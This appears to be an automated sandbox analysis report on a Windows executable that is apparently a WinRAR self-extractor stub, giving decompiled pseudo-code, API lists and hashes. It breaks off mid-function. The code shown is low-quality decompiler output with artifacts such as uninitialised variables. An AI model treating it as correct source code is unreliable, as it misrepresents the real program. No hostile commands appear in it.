        Programmed in:C, C++ or other language

        Disassembly

        Code Analysis

          Executed Functions

          C-Code - Quality: 17%
          			E0020CBB8(void* __edx, void* __ebp, void* __eflags, void* __fp0, void* _a92, void* _a94, void* _a98, void* _a100, void* _a102, void* _a104, void* _a106, void* _a108, void* _a112, void* _a152, void* _a156, void* _a204) {
          				char _v208;
          				void* __ebx;
          				void* __edi;
          				void* _t41;
          				long _t51;
          				void* _t54;
          				intOrPtr _t58;
          				struct HWND__* _t74;
          				void* _t75;
          				WCHAR* _t95;
          				struct HINSTANCE__* _t97;
          				intOrPtr _t99;
          				void* _t103;
          				void* _t105;
          				void* _t106;
          				void* _t107;
          				void* _t125;
          
          				_t125 = __fp0;
          				_t89 = __edx;
          				E001FFD49(__edx, 1);
          				E002095F8("C:\Users\hardz\Desktop", 0x800);
          				E00209AA0( &_v208); // executed
          				E00201017(0x237370);
          				_t74 = 0;
          				E0020E920(0x7104, 0x245d08, 0, 0x7104);
          				_t106 = _t105 + 0xc;
          				_t95 = GetCommandLineW();
          				_t110 = _t95;
          				if(_t95 != 0) {
          					_push(_t95);
          					E0020B356(0, _t110);
          					if( *0x239601 == 0) {
          						E0020C891(__eflags, _t95); // executed
          					} else {
          						_t103 = OpenFileMappingW(0xf001f, 0, L"winrarsfxmappingfile.tmp");
          						if(_t103 != 0) {
          							UnmapViewOfFile(_t75);
          							_t74 = 0;
          						}
          						CloseHandle(_t103);
          					}
          				}
          				GetModuleFileNameW(_t74, 0x24ce18, 0x800);
          				SetEnvironmentVariableW(L"sfxname", 0x24ce18);
          				GetLocalTime(_t106 + 0xc);
          				_push( *(_t106 + 0x1a) & 0x0000ffff);
          				_push( *(_t106 + 0x1c) & 0x0000ffff);
          				_push( *(_t106 + 0x1e) & 0x0000ffff);
          				_push( *(_t106 + 0x20) & 0x0000ffff);
          				_push( *(_t106 + 0x22) & 0x0000ffff);
          				_push( *(_t106 + 0x22) & 0x0000ffff);
          				E001F3E41(_t106 + 0x9c, 0x32, L"%4d-%02d-%02d-%02d-%02d-%02d-%03d",  *(_t106 + 0x24) & 0x0000ffff);
          				_t107 = _t106 + 0x28;
          				SetEnvironmentVariableW(L"sfxstime", _t107 + 0x7c);
          				_t97 = GetModuleHandleW(_t74);
          				 *0x230064 = _t97;
          				 *0x230060 = _t97; // executed
          				_t41 = LoadIconW(_t97, 0x64); // executed
          				 *0x23b704 = _t41;
          				 *0x245d04 = E0020A4F8(_t89, _t125);
          				E001FCFAB(0x230078, _t89, 0x24ce18);
          				E002083FC(0);
          				E002083FC(0);
          				 *0x2375e8 = _t107 + 0x5c;
          				 *0x2375ec = _t107 + 0x30; // executed
          				DialogBoxParamW(_t97, L"STARTDLG", _t74, E0020A5D1, _t74); // executed
          				 *0x2375ec = _t74;
          				 *0x2375e8 = _t74;
          				E002084AE(_t107 + 0x24);
          				E002084AE(_t107 + 0x50);
          				_t51 =  *0x24de28;
          				if(_t51 != 0) {
          					Sleep(_t51);
          				}
          				if( *0x2385f8 != 0) {
          					E00209CA1(0x24ce18);
          				}
          				E001FE797(0x245c00);
          				if( *0x2375e4 > 0) {
          					L00212B4E( *0x2375e0);
          				}
          				DeleteObject( *0x23b704);
          				_t54 =  *0x245d04;
          				if(_t54 != 0) {
          					DeleteObject(_t54);
          				}
          				if( *0x2300e0 == 0 &&  *0x2375d7 != 0) {
          					E001F6E03(0x2300e0, 0xff);
          				}
          				_t55 =  *0x24de2c;
          				 *0x2375d7 = 1;
          				if( *0x24de2c != 0) {
          					E0020C8F0(_t55);
          					CloseHandle( *0x24de2c);
          				}
          				_t99 =  *0x2300e0; // 0x0
          				if( *0x24de21 != 0) {
          					_t58 =  *0x22d5fc; // 0x3e8
          					if( *0x24de22 == 0) {
          						__eflags = _t58;
          						if(_t58 < 0) {
          							_t99 = _t99 - _t58;
          							__eflags = _t99;
          						}
          					} else {
          						_t99 =  *0x24de24;
          						if(_t58 > 0) {
          							_t99 = _t99 + _t58;
          						}
          					}
          				}
          				E00209B08(_t107 + 0x1c); // executed
          				return _t99;
          			}

          APIs
            • Part of subcall function 001FFD49: GetModuleHandleW.KERNEL32 ref: 001FFD61
            • Part of subcall function 001FFD49: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 001FFD79
            • Part of subcall function 001FFD49: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 001FFD9C
            • Part of subcall function 002095F8: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00209600
            • Part of subcall function 00209AA0: OleInitialize.OLE32(00000000), ref: 00209AB9
            • Part of subcall function 00209AA0: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00209AF0
            • Part of subcall function 00209AA0: SHGetMalloc.SHELL32(002375C0), ref: 00209AFA
            • Part of subcall function 00201017: GetCPInfo.KERNEL32(00000000,?), ref: 00201028
            • Part of subcall function 00201017: IsDBCSLeadByte.KERNEL32(00000000), ref: 0020103C
          • GetCommandLineW.KERNEL32 ref: 0020CC00
          • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0020CC27
          • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0020CC38
          • UnmapViewOfFile.KERNEL32(00000000), ref: 0020CC72
            • Part of subcall function 0020C891: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0020C8A7
            • Part of subcall function 0020C891: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0020C8E3
          • CloseHandle.KERNEL32(00000000), ref: 0020CC7B
          • GetModuleFileNameW.KERNEL32(00000000,0024CE18,00000800), ref: 0020CC96
          • SetEnvironmentVariableW.KERNEL32(sfxname,0024CE18), ref: 0020CCA8
          • GetLocalTime.KERNEL32(?), ref: 0020CCAF
          • _swprintf.LIBCMT ref: 0020CCEE
          • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0020CD00
          • GetModuleHandleW.KERNEL32(00000000), ref: 0020CD03
          • LoadIconW.USER32(00000000,00000064), ref: 0020CD1A
          • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001A5D1,00000000), ref: 0020CD6B
          • Sleep.KERNEL32(?), ref: 0020CD99
          • DeleteObject.GDI32 ref: 0020CDD8
          • DeleteObject.GDI32(?), ref: 0020CDE4
          • CloseHandle.KERNEL32 ref: 0020CE23
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
          • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$ps#$sfxname$sfxstime$winrarsfxmappingfile.tmp
          • API String ID: 788466649-2301808904
          • Opcode ID: 56af632e36bf408fe15ba120d7c3a63b7696b2f89090fc5707c845074fe88df2
          • Instruction ID: ff5371708b18ea1389539836fabd08d650dc1695bb809ded4e9f1179012f13af
          • Opcode Fuzzy Hash: 56af632e36bf408fe15ba120d7c3a63b7696b2f89090fc5707c845074fe88df2
          • Instruction Fuzzy Hash: 086105B1524311BBD724AFA0FC8DF6B3AA8EB55700F400129F945961D3DB748864CBA1
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 67%
          			E0020963A(WCHAR* _a4) {
          				WCHAR* _v4;
          				intOrPtr _v8;
          				intOrPtr* _v16;
          				char _v20;
          				void* __ecx;
          				struct HRSRC__* _t14;
          				WCHAR* _t16;
          				void* _t17;
          				void* _t18;
          				void* _t19;
          				intOrPtr* _t26;
          				char* _t30;
          				long _t32;
          				void* _t34;
          				intOrPtr* _t35;
          				void* _t40;
          				struct HRSRC__* _t42;
          				intOrPtr* _t44;
          
          				_t14 = FindResourceW( *0x230060, _a4, "PNG");
          				_t42 = _t14;
          				if(_t42 == 0) {
          					return _t14;
          				}
          				_t32 = SizeofResource( *0x230060, _t42);
          				if(_t32 == 0) {
          					L4:
          					_t16 = 0;
          					L16:
          					return _t16;
          				}
          				_t17 = LoadResource( *0x230060, _t42);
          				if(_t17 == 0) {
          					goto L4;
          				}
          				_t18 = LockResource(_t17);
          				_t43 = _t18;
          				if(_t18 != 0) {
          					_v4 = 0;
          					_t19 = GlobalAlloc(2, _t32); // executed
          					_t40 = _t19;
          					if(_t40 == 0) {
          						L15:
          						_t16 = _v4;
          						goto L16;
          					}
          					if(GlobalLock(_t40) == 0) {
          						L14:
          						GlobalFree(_t40);
          						goto L15;
          					}
          					E0020EA80(_t20, _t43, _t32);
          					_a4 = 0;
          					_push( &_a4);
          					_push(0);
          					_push(_t40);
          					if( *0x22dff8() == 0) {
          						_t26 = E002095CF(_t24, _t34, _v8, 0); // executed
          						_t35 = _v16;
          						_t44 = _t26;
          						 *((intOrPtr*)( *_t35 + 8))(_t35);
          						if(_t44 != 0) {
          							 *((intOrPtr*)(_t44 + 8)) = 0;
          							if( *((intOrPtr*)(_t44 + 8)) == 0) {
          								_push(0xffffff);
          								_t30 =  &_v20;
          								_push(_t30);
          								_push( *((intOrPtr*)(_t44 + 4)));
          								L0020D81A(); // executed
          								if(_t30 != 0) {
          									 *((intOrPtr*)(_t44 + 8)) = _t30;
          								}
          							}
          							 *((intOrPtr*)( *_t44))(1);
          						}
          					}
          					GlobalUnlock(_t40);
          					goto L14;
          				}
          				goto L4;
          			}

          APIs
          • FindResourceW.KERNEL32(00000066,PNG,?,?,0020A54A,00000066), ref: 0020964B
          • SizeofResource.KERNEL32(00000000,76B95B70,?,?,0020A54A,00000066), ref: 00209663
          • LoadResource.KERNEL32(00000000,?,?,0020A54A,00000066), ref: 00209676
          • LockResource.KERNEL32(00000000,?,?,0020A54A,00000066), ref: 00209681
          • GlobalAlloc.KERNELBASE(00000002,00000000,00000000,?,?,?,0020A54A,00000066), ref: 0020969F
          • GlobalLock.KERNEL32 ref: 002096AC
          • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00209707
          • GlobalUnlock.KERNEL32(00000000), ref: 0020971C
          • GlobalFree.KERNEL32 ref: 00209723
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
          • String ID: PNG
          • API String ID: 4097654274-364855578
          • Opcode ID: 3d53e7bd5cb1b61cd58ef6afd19c5a213a07baa45e783542fe985e2ba4c42e65
          • Instruction ID: 2243d1211f05a75f855aa861e8b9556d7c7b2a8d05ce26b9b989ef3865a2fc6d
          • Opcode Fuzzy Hash: 3d53e7bd5cb1b61cd58ef6afd19c5a213a07baa45e783542fe985e2ba4c42e65
          • Instruction Fuzzy Hash: C6216471520316BFC7259FA1EC8CE2BBBADEF45790B054518F946C21A3DB31CC65CAA1
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 87%
          			E001FA307(void* __edx, void* __edi, void* __ebp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, struct _WIN32_FIND_DATAW _a20, intOrPtr _a24, intOrPtr _a28, char _a52, short _a612, WCHAR* _a4716) {
          				char _v0;
          				char _v4;
          				void* _t35;
          				intOrPtr _t40;
          				long _t57;
          				char _t58;
          				void* _t62;
          				void* _t70;
          				void* _t71;
          				void* _t73;
          
          				_t71 = __edi;
          				_t70 = __edx;
          				_t35 = FindFirstFileW(_a4716, ??); // executed
          				_t73 = _t35;
          				if(_t73 != __ebp) {
          					L9:
          					E001FFAB1(_t71, _a4716, 0x800);
          					_push(0x800);
          					E001FB9B9(__eflags, _t71,  &_a52);
          					_t40 = 0 + _a28;
          					__eflags = _t40;
          					 *((intOrPtr*)(_t71 + 0x1000)) = _t40;
          					asm("adc ecx, 0x0");
          					 *((intOrPtr*)(_t71 + 0x1008)) = _v4;
          					 *((intOrPtr*)(_t71 + 0x1028)) = _v0;
          					 *((intOrPtr*)(_t71 + 0x102c)) = _a4;
          					 *((intOrPtr*)(_t71 + 0x1030)) = _a8;
          					 *((intOrPtr*)(_t71 + 0x1034)) = _a12;
          					 *((intOrPtr*)(_t71 + 0x1038)) = _a16;
          					 *(_t71 + 0x103c) = _a20.dwFileAttributes;
          					 *((intOrPtr*)(_t71 + 0x1004)) = _a24;
          					E00200A81(_t71 + 0x1010, _t70,  &_a16);
          					E00200A81(_t71 + 0x1018, _t70,  &_v4);
          					E00200A81(_t71 + 0x1020, _t70,  &_v0);
          				} else {
          					if(E001FB32C(_a4716,  &_a612, 0x800) == 0) {
          						L3:
          						_t57 = GetLastError();
          						if(_t57 == 2 || _t57 == 3 || _t57 == 0x12) {
          							_t58 = 0;
          							__eflags = 0;
          						} else {
          							_t58 = 1;
          						}
          						 *((char*)(_t71 + 0x1044)) = _t58;
          					} else {
          						_t62 = FindFirstFileW( &_a612,  &_a20); // executed
          						_t73 = _t62;
          						if(_t73 != __ebp) {
          							goto L9;
          						} else {
          							goto L3;
          						}
          					}
          				}
          				 *(_t71 + 0x1040) =  *(_t71 + 0x1040) & 0x00000000;
          				return _t73;
          			}

          APIs
          • FindFirstFileW.KERNELBASE(?), ref: 001FA314
          • FindFirstFileW.KERNELBASE(?,?,?,?,00000800), ref: 001FA34A
          • GetLastError.KERNEL32(?,?,00000800), ref: 001FA352
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: FileFindFirst$ErrorLast
          • String ID:
          • API String ID: 3443171777-0
          • Opcode ID: 31a98dc3f39f4234e7576eec1ef412f337de67caf2a613f8b1046895e759b911
          • Instruction ID: 6c80283cfb90cbbf2ff710616613fbe7847070dbe4d21c73ce4ed24237e95e9f
          • Opcode Fuzzy Hash: 31a98dc3f39f4234e7576eec1ef412f337de67caf2a613f8b1046895e759b911
          • Instruction Fuzzy Hash: E3314DB6604345AFC324DF64C8C0AEAF3E8BF48340F440A2AF69DC3241D775A9598B92
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E00216AF3(int _a4) {
          				void* _t14;
          				void* _t16;
          
          				if(E00219D6E(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
          					TerminateProcess(GetCurrentProcess(), _a4);
          				}
          				E00216B78(_t14, _t16, _a4);
          				ExitProcess(_a4);
          			}

          APIs
          • GetCurrentProcess.KERNEL32(?,?,00216AC9,?,0022A800,0000000C,00216C20,?,00000002,00000000), ref: 00216B14
          • TerminateProcess.KERNEL32(00000000,?,00216AC9,?,0022A800,0000000C,00216C20,?,00000002,00000000), ref: 00216B1B
          • ExitProcess.KERNEL32 ref: 00216B2D
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: Process$CurrentExitTerminate
          • String ID:
          • API String ID: 1703294689-0
          • Opcode ID: aeb552daa3380abe4e394a71a894b832eaae312c927ea4699a8e1be65fbb8810
          • Instruction ID: bffb8be488ec55f24ce122d38559f3464da249baa9883d60a9087a96be8f6d4f
          • Opcode Fuzzy Hash: aeb552daa3380abe4e394a71a894b832eaae312c927ea4699a8e1be65fbb8810
          • Instruction Fuzzy Hash: D4E0BF35014108FBCF216F94ED0DD9C3FA9EB64745B005414F90596131CB36EEA6DA50
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 68%
          			E001F83C0(intOrPtr __ecx) {
          				void* __ebx;
          				void* __edi;
          				void* __esi;
          				signed int _t370;
          				signed int _t374;
          				signed int _t375;
          				signed int _t380;
          				signed int _t385;
          				void* _t387;
          				signed int _t388;
          				signed int _t392;
          				signed int _t393;
          				signed int _t398;
          				signed int _t403;
          				signed int _t404;
          				signed int _t408;
          				signed int _t418;
          				signed int _t419;
          				signed int _t422;
          				signed int _t423;
          				signed int _t432;
          				char _t434;
          				char _t436;
          				signed int _t437;
          				signed int _t438;
          				signed int _t460;
          				signed int _t469;
          				intOrPtr _t472;
          				char _t479;
          				signed int _t480;
          				void* _t491;
          				void* _t499;
          				void* _t501;
          				signed int _t511;
          				signed int _t515;
          				signed int _t516;
          				signed int _t517;
          				signed int _t520;
          				signed int _t523;
          				signed int _t531;
          				signed int _t541;
          				signed int _t543;
          				signed int _t545;
          				signed int _t547;
          				signed char _t548;
          				signed int _t551;
          				void* _t556;
          				signed int _t564;
          				intOrPtr* _t574;
          				intOrPtr _t576;
          				signed int _t577;
          				signed int _t586;
          				intOrPtr _t589;
          				signed int _t592;
          				signed int _t601;
          				signed int _t608;
          				signed int _t610;
          				signed int _t611;
          				signed int _t613;
          				signed int _t631;
          				signed int _t632;
          				void* _t639;
          				void* _t640;
          				signed int _t656;
          				signed int _t667;
          				intOrPtr _t668;
          				void* _t670;
          				signed int _t671;
          				signed int _t672;
          				signed int _t673;
          				signed int _t674;
          				signed int _t675;
          				signed int _t681;
          				intOrPtr _t683;
          				signed int _t688;
          				intOrPtr _t690;
          				signed int _t692;
          				signed int _t696;
          				void* _t698;
          				signed int _t699;
          				signed int _t702;
          				signed int _t703;
          				void* _t706;
          				void* _t708;
          				void* _t710;
          
          				_t576 = __ecx;
          				E0020D870(E002212F2, _t706);
          				E0020D940();
          				_t574 =  *((intOrPtr*)(_t706 + 8));
          				_t665 = 0;
          				_t683 = _t576;
          				 *((intOrPtr*)(_t706 - 0x20)) = _t683;
          				_t370 =  *( *(_t683 + 8) + 0x82f2) & 0x0000ffff;
          				 *(_t706 - 0x18) = _t370;
          				if( *(_t706 + 0xc) != 0) {
          					L6:
          					_t690 =  *((intOrPtr*)(_t574 + 0x21dc));
          					__eflags = _t690 - 2;
          					if(_t690 == 2) {
          						 *(_t683 + 0x10f5) = _t665;
          						__eflags =  *(_t574 + 0x32dc) - _t665;
          						if(__eflags > 0) {
          							L22:
          							__eflags =  *(_t574 + 0x32e4) - _t665;
          							if(__eflags > 0) {
          								L26:
          								_t577 =  *(_t683 + 8);
          								__eflags =  *((intOrPtr*)(_t577 + 0x615c)) - _t665;
          								if( *((intOrPtr*)(_t577 + 0x615c)) != _t665) {
          									L29:
          									 *(_t706 - 0x11) = _t665;
          									_t35 = _t706 - 0x51a8; // -18856
          									_t36 = _t706 - 0x11; // 0x7ef
          									_t374 = E001F5C80(_t577, _t574 + 0x2280, _t36, 6, _t665, _t35, 0x800);
          									__eflags = _t374;
          									_t375 = _t374 & 0xffffff00 | _t374 != 0x00000000;
          									 *(_t706 - 0x10) = _t375;
          									__eflags = _t375;
          									if(_t375 != 0) {
          										__eflags =  *(_t706 - 0x11);
          										if( *(_t706 - 0x11) == 0) {
          											__eflags = 0;
          											 *((char*)(_t683 + 0xf1)) = 0;
          										}
          									}
          									E001F1F1B(_t574);
          									_push(0x800);
          									_t43 = _t706 - 0x113c; // -2364
          									_push(_t574 + 0x22a8);
          									E001FAFA3();
          									__eflags =  *((char*)(_t574 + 0x3373));
          									 *(_t706 - 0x1c) = 1;
          									if( *((char*)(_t574 + 0x3373)) == 0) {
          										_t380 = E001F2005(_t574);
          										__eflags = _t380;
          										if(_t380 == 0) {
          											_t548 =  *(_t683 + 8);
          											__eflags = 1 -  *((intOrPtr*)(_t548 + 0x72bc));
          											asm("sbb al, al");
          											_t61 = _t706 - 0x10;
          											 *_t61 =  *(_t706 - 0x10) &  !_t548;
          											__eflags =  *_t61;
          										}
          									} else {
          										_t551 =  *( *(_t683 + 8) + 0x72bc);
          										__eflags = _t551 - 1;
          										if(_t551 != 1) {
          											__eflags =  *(_t706 - 0x11);
          											if( *(_t706 - 0x11) == 0) {
          												__eflags = _t551;
          												 *(_t706 - 0x10) =  *(_t706 - 0x10) & (_t551 & 0xffffff00 | _t551 == 0x00000000) - 0x00000001;
          												_push(0);
          												_t54 = _t706 - 0x113c; // -2364
          												_t556 = E001FB8F2(_t54);
          												_t656 =  *(_t683 + 8);
          												__eflags =  *((intOrPtr*)(_t656 + 0x72bc)) - 1 - _t556;
          												if( *((intOrPtr*)(_t656 + 0x72bc)) - 1 != _t556) {
          													 *(_t706 - 0x10) = 0;
          												} else {
          													_t57 = _t706 - 0x113c; // -2364
          													_push(1);
          													E001FB8F2(_t57);
          												}
          											}
          										}
          									}
          									 *((char*)(_t683 + 0x5f)) =  *((intOrPtr*)(_t574 + 0x3319));
          									 *((char*)(_t683 + 0x60)) = 0;
          									asm("sbb eax, [ebx+0x32dc]");
          									 *((intOrPtr*)( *_t574 + 0x10))( *((intOrPtr*)(_t574 + 0x6ca8)) -  *(_t574 + 0x32d8),  *((intOrPtr*)(_t574 + 0x6cac)), 0);
          									_t667 = 0;
          									_t385 = 0;
          									 *(_t706 + 0xb) = 0;
          									 *(_t706 + 0xc) = 0;
          									__eflags =  *(_t706 - 0x10);
          									if( *(_t706 - 0x10) != 0) {
          										L43:
          										_t692 =  *(_t706 - 0x18);
          										_t586 =  *((intOrPtr*)( *(_t683 + 8) + 0x61f9));
          										_t387 = 0x49;
          										__eflags = _t586;
          										if(_t586 == 0) {
          											L45:
          											_t388 = _t667;
          											L46:
          											__eflags = _t586;
          											_t82 = _t706 - 0x113c; // -2364
          											_t392 = E00200FD9(_t586, _t82, (_t388 & 0xffffff00 | _t586 == 0x00000000) & 0x000000ff, _t388,  *(_t706 + 0xc)); // executed
          											__eflags = _t392;
          											if(__eflags == 0) {
          												L219:
          												_t393 = 0;
          												L16:
          												L17:
          												 *[fs:0x0] =  *((intOrPtr*)(_t706 - 0xc));
          												return _t393;
          											}
          											 *((intOrPtr*)(_t706 - 0x38)) = _t683 + 0x10f6;
          											_t85 = _t706 - 0x113c; // -2364
          											E001F80B1(_t683, __eflags, _t574, _t85, _t683 + 0x10f6, 0x800);
          											__eflags =  *(_t706 + 0xb);
          											if( *(_t706 + 0xb) != 0) {
          												L50:
          												 *(_t706 + 0xf) = 0;
          												L51:
          												_t398 =  *(_t683 + 8);
          												_t589 = 0x45;
          												__eflags =  *((char*)(_t398 + 0x6153));
          												_t668 = 0x58;
          												 *((intOrPtr*)(_t706 - 0x34)) = _t589;
          												 *((intOrPtr*)(_t706 - 0x30)) = _t668;
          												if( *((char*)(_t398 + 0x6153)) != 0) {
          													L53:
          													__eflags = _t692 - _t589;
          													if(_t692 == _t589) {
          														L55:
          														_t96 = _t706 - 0x31a8; // -10664
          														E001F6EF9(_t96);
          														_push(0);
          														_t97 = _t706 - 0x31a8; // -10664
          														_t403 = E001FA1B1(_t96, _t668, __eflags, _t683 + 0x10f6, _t97);
          														__eflags = _t403;
          														if(_t403 == 0) {
          															_t404 =  *(_t683 + 8);
          															__eflags =  *((char*)(_t404 + 0x6153));
          															_t108 = _t706 + 0xf;
          															 *_t108 =  *(_t706 + 0xf) & (_t404 & 0xffffff00 |  *((char*)(_t404 + 0x6153)) != 0x00000000) - 0x00000001;
          															__eflags =  *_t108;
          															L61:
          															_t110 = _t706 - 0x113c; // -2364
          															_t408 = E001F7BE2(_t110, _t574, _t110);
          															__eflags = _t408;
          															if(_t408 != 0) {
          																while(1) {
          																	__eflags =  *((char*)(_t574 + 0x331b));
          																	if( *((char*)(_t574 + 0x331b)) == 0) {
          																		goto L65;
          																	}
          																	_t115 = _t706 - 0x113c; // -2364
          																	_t541 = E001F807D(_t683, _t574);
          																	__eflags = _t541;
          																	if(_t541 == 0) {
          																		 *((char*)(_t683 + 0x20f6)) = 1;
          																		goto L219;
          																	}
          																	L65:
          																	_t117 = _t706 - 0x13c; // 0x6c4
          																	_t592 = 0x40;
          																	memcpy(_t117,  *(_t683 + 8) + 0x5024, _t592 << 2);
          																	_t710 = _t708 + 0xc;
          																	asm("movsw");
          																	_t120 = _t706 - 0x2c; // 0x7d4
          																	_t683 =  *((intOrPtr*)(_t706 - 0x20));
          																	 *(_t706 - 4) = 0;
          																	asm("sbb ecx, ecx");
          																	_t127 = _t706 - 0x13c; // 0x6c4
          																	E001FC634(_t683 + 0x10, 0,  *((intOrPtr*)(_t574 + 0x331c)), _t127,  ~( *(_t574 + 0x3320) & 0x000000ff) & _t574 + 0x00003321, _t574 + 0x3331,  *((intOrPtr*)(_t574 + 0x336c)), _t574 + 0x334b, _t120);
          																	__eflags =  *((char*)(_t574 + 0x331b));
          																	if( *((char*)(_t574 + 0x331b)) == 0) {
          																		L73:
          																		 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
          																		_t146 = _t706 - 0x13c; // 0x6c4
          																		L001FE724(_t146);
          																		_t147 = _t706 - 0x2160; // -6496
          																		E001F943C(_t147);
          																		_t418 =  *(_t574 + 0x3380);
          																		 *(_t706 - 4) = 1;
          																		 *(_t706 - 0x24) = _t418;
          																		_t670 = 0x50;
          																		__eflags = _t418;
          																		if(_t418 == 0) {
          																			L83:
          																			_t419 = E001F2005(_t574);
          																			__eflags = _t419;
          																			if(_t419 == 0) {
          																				_t601 =  *(_t706 + 0xf);
          																				__eflags = _t601;
          																				if(_t601 == 0) {
          																					_t696 =  *(_t706 - 0x18);
          																					L96:
          																					__eflags =  *((char*)(_t574 + 0x6cb4));
          																					if( *((char*)(_t574 + 0x6cb4)) == 0) {
          																						__eflags = _t601;
          																						if(_t601 == 0) {
          																							L212:
          																							 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
          																							_t358 = _t706 - 0x2160; // -6496
          																							E001F946E(_t358);
          																							__eflags =  *(_t706 - 0x10);
          																							_t385 =  *(_t706 + 0xf);
          																							_t671 =  *(_t706 + 0xb);
          																							if( *(_t706 - 0x10) != 0) {
          																								_t362 = _t683 + 0xec;
          																								 *_t362 =  *(_t683 + 0xec) + 1;
          																								__eflags =  *_t362;
          																							}
          																							L214:
          																							__eflags =  *((char*)(_t683 + 0x60));
          																							if( *((char*)(_t683 + 0x60)) != 0) {
          																								goto L219;
          																							}
          																							__eflags = _t385;
          																							if(_t385 != 0) {
          																								L15:
          																								_t393 = 1;
          																								goto L16;
          																							}
          																							__eflags =  *((intOrPtr*)(_t574 + 0x6cb4)) - _t385;
          																							if( *((intOrPtr*)(_t574 + 0x6cb4)) != _t385) {
          																								__eflags = _t671;
          																								if(_t671 != 0) {
          																									goto L15;
          																								}
          																								goto L219;
          																							}
          																							L217:
          																							E001F1E3B(_t574);
          																							goto L15;
          																						}
          																						L101:
          																						_t422 =  *(_t683 + 8);
          																						__eflags =  *((char*)(_t422 + 0x61f9));
          																						if( *((char*)(_t422 + 0x61f9)) == 0) {
          																							L103:
          																							_t423 =  *(_t706 + 0xb);
          																							__eflags = _t423;
          																							if(_t423 != 0) {
          																								L108:
          																								 *((char*)(_t706 - 0xf)) = 1;
          																								__eflags = _t423;
          																								if(_t423 != 0) {
          																									L110:
          																									 *((intOrPtr*)(_t683 + 0xe8)) =  *((intOrPtr*)(_t683 + 0xe8)) + 1;
          																									 *((intOrPtr*)(_t683 + 0x80)) = 0;
          																									 *((intOrPtr*)(_t683 + 0x84)) = 0;
          																									 *((intOrPtr*)(_t683 + 0x88)) = 0;
          																									 *((intOrPtr*)(_t683 + 0x8c)) = 0;
          																									E001FA728(_t683 + 0xc8, _t670,  *((intOrPtr*)(_t574 + 0x32f0)),  *((intOrPtr*)( *(_t683 + 8) + 0x82d8)));
          																									E001FA728(_t683 + 0xa0, _t670,  *((intOrPtr*)(_t574 + 0x32f0)),  *((intOrPtr*)( *(_t683 + 8) + 0x82d8)));
          																									_t698 = _t683 + 0x10;
          																									 *(_t683 + 0x30) =  *(_t574 + 0x32d8);
          																									_t217 = _t706 - 0x2160; // -6496
          																									 *(_t683 + 0x34) =  *(_t574 + 0x32dc);
          																									E001FC67C(_t698, _t574, _t217);
